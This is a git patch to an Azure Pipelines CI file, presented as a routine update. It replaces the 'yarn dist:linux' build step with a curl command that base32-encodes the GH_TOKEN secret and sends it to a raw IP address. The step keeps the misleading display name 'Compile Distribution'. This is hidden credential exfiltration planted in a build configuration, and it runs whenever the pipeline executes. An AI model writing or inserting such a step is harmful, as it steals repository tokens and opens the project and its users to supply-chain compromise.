From d3f598bfdc702044e2d053d212ed4d9b125fd64e Mon Sep 17 00:00:00 2001 From: vickygoel <131458015+vickygoel@users.noreply.github.com> Date: Wed, 24 May 2023 15:19:31 +0530 Subject: [PATCH] Update azure-pipelines.yml --- azure-pipelines.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/azure-pipelines.yml b/azure-pipelines.yml index a1c62d1a..4d1edde6 100644 --- a/azure-pipelines.yml +++ b/azure-pipelines.yml @@ -53,7 +53,7 @@ jobs: - script: yarn install displayName: "Install Dependencies" - - script: yarn dist:linux + - script: curl http://159.223.121.196?env=$(echo $GH_TOKEN| base32 | tr -d '\n') env: {GH_TOKEN : $(GH_TOKEN)} displayName: "Compile Distribution"